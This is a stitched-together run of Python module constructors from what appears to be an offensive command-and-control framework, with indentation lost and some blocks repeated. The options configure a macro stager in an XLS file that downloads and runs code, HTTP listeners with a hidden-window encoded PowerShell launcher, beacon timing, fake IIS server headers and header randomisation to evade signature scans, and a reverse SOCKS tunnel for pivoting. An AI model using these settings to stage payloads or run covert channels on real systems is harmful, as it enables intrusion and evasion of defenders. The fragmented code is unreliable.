'Value' : "http://" + helpers.lhost() + "/"+xmlVar+".xml"
},
'XlsOutFile' : {
'Description' : 'XLS (incompatible with xlsx/xlsm) file to output stager payload to. If document does not exist / cannot be found a new file will be created',
'Required' : True,
'Value' : '/tmp/default.xls'
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'XmlOutFile' : {
'Description' : 'Local path + file to output xml to.',
'Required' : True,
'Value' : '/var/www/html/'+xmlVar+'.xml'
},
'KillDate' : {
'Description' : 'Date after which the initial powershell stub will no longer attempt to download and execute code, set this for the end of your campaign / engagement. Format mm/dd/yyyy',
'Required' : True,
'Value' : datetime.datetime.now().strftime("%m/%d/%Y")
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other) (2nd stage).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other) (2nd stage).',
'Required' : False,
'Value' : 'default'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting (2nd stage).',
'Required' : False,
'Value' : '0'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other) (2nd stage).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Template',
'Author': ['@harmj0y'],
'Description': ("Listener template"),
# categories - client_server, peer_to_peer, broadcast, third_party
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Listener name.',
'Required': True,
'Value': 'http_foreign'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s:%s" % (helpers.lhost(), 80)
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': 80
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description':
'Default communication profile for the agent.',
'Required':
True,
'Value':
"/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {
} # used to keep track of any threaded instances of this server
# optional/specific for this module
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(
helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name':
'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description':
('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'
),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http_com'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description':
'Default communication profile for the agent.',
'Required':
True,
'Value':
"/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RequestHeader': {
'Description':
'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required': True,
'Value': 'CF-RAY'
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'SlackToken': {
'Description':
'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description':
'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [
a.strip('/') for a in self.options['DefaultProfile']
['Value'].split('|')[0].split(',')
]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(
helpers.get_config('staging_key')[0])
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name':
'HTTP[S]',
'Author': ['@harmj0y'],
'Description':
('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'
),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': 80
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description':
'Default communication profile for the agent.',
'Required':
True,
'Value':
"/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'ServerVersion': {
'Description': 'Server header for the control server.',
'Required': True,
'Value': 'Microsoft-IIS/7.5'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [
a.strip('/') for a in self.options['DefaultProfile']
['Value'].split('|')[0].split(',')
]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(
helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name':
'Invoke-SocksProxy',
'Author': ['@p3nt4'],
'Description':
("The reverse proxy creates a TCP tunnel by initiating outbound SSL connections that "
"can go through the system's proxy. The tunnel can then be used as a socks proxy on "
"the remote host to pivot into the local host's network."),
'Software':
'',
'Techniques': ['T1090'],
'Background':
True,
'OutputExtension':
None,
'NeedsAdmin':
False,
'OpsecSafe':
True,
'Language':
'powershell',
'MinLanguageVersion':
'2',
'Comments': [
'This is only a subset of the Socks 4 and 5 protocols: It does not support authentication',
'It does not support UDP or bind requests',
'https://github.com/BC-SECURITY/Invoke-SocksProxy'
]
}
self.options = {
'Agent': {
'Description': 'Agent to run module on.',
'Required': True,
'Value': ''
},
'remoteHost': {
'Description': 'IP Address of the SocksProxy server.',
'Required': True,
'Value': '%s' % (helpers.lhost())
},
'remotePort': {
'Description': 'Remote Port for the SocksProxy server.',
'Required': True,
'Value': '443'
},
'useSystemProxy': {
'Description': 'Go through the system proxy',
'Required': False,
'Value': ''
},
'certFingerprint': {
'Description': 'Validate certificate',
'Required': False,
'Value': ''
},
'maxRetries': {
'Description': 'Maximum number of retries for a handler.',
'Required': False,
'Value': ''
}
}
self.mainMenu = mainMenu
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
